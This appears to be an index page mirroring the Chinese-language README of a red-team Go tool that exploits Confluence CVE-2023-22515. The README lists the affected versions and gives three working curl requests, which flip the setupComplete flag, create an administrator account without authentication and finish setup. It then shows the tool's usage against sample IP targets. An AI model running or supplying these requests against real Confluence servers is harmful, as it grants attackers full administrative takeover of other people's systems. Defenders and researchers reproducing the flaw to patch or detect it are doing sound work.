Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/ad-calcium/CVE-2023-22515

Confluence未授权添加管理员用户(CVE-2023-22515)漏洞利用工具
https://github.com/ad-calcium/CVE-2023-22515

Last synced: 3 months ago
JSON representation

Confluence未授权添加管理员用户(CVE-2023-22515)漏洞利用工具

Host: GitHub
URL: https://github.com/ad-calcium/CVE-2023-22515
Owner: ad-calcium
Created: 2023-10-11T08:42:17.000Z (about 1 year ago)
Default Branch: main
Last Pushed: 2023-10-16T02:24:02.000Z (about 1 year ago)
Last Synced: 2023-10-16T21:28:16.402Z (about 1 year ago)
Language: Go
Size: 2.16 MB
Stars: 67
Watchers: 3
Forks: 6
Open Issues: 0
Metadata Files:
- Readme: README.md

Awesome Lists containing this project

awesome-hacking-lists - ad-calcium/CVE-2023-22515 - Confluence未授权添加管理员用户(CVE-2023-22515)漏洞利用工具 (Go)

README

        # 红队工具-Confluence未授权添加管理员用户(CVE-2023-22515)漏洞利用工具

## 漏洞影响范围

```

8.0.0 <= Confluence Data Center and Confluence Server <= 8.0.4

8.1.0 <= Confluence Data Center and Confluence Server <= 8.1.4

8.2.0 <= Confluence Data Center and Confluence Server <= 8.2.3

8.3.0 <= Confluence Data Center and Confluence Server <= 8.3.2

8.4.0 <= Confluence Data Center and Confluence Server <= 8.4.2

8.5.0 <= Confluence Data Center and Confluence Server <= 8.5.1

```

## 漏洞利用

### 1.正常访问，提示已经完成安装

```

curl -vk http://IP/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false

```

### 2.创建管理员用户

```

test123 Password2

```

执行如下命令

```

curl -vk -X POST -H "X-Atlassian-Token: no-check" --data-raw "username=test123&fullName=test123&email=test123@localhost&password=Password2&confirm=Password2&setup-next-button=Next" http://IP/setup/setupadministrator.action

```

### 3.设置已完成

```

curl -vk -X POST -H "X-Atlassian-Token: no-check" http://IP/setup/finishsetup.action

```

## 用法

```

cve-2023-22515.exe

Usage of cve-2023-22515.exe:

  -pass string

        指定要添加的密码

  -proxy string

        设置代理

  -u string

        指定目标

  -user string

        指定要添加的用户名

```

### 随机账号密码

```

cve-2023-22515.exe -u http://10.108.3.117:8090

```

![image-2023101116485852](images/Snipaste_2023-10-16_10-14-22.png)

### 手动添加管理员用户

```

cve-2023-22515.exe -u http://10.108.3.117:8090 -user tesxe17 -pass Password2

```

![image-20231011164858593](images/image-20231011164858593.png)

## 更新日志

```

[+] 2023/10/16 增加随机用户名密码

```

## Star History

[![Star History Chart](https://api.star-history.com/svg?repos=ad-calcium/CVE-2023-22515&type=Date)](https://star-history.com/#ad-calcium/CVE-2023-22515&Date)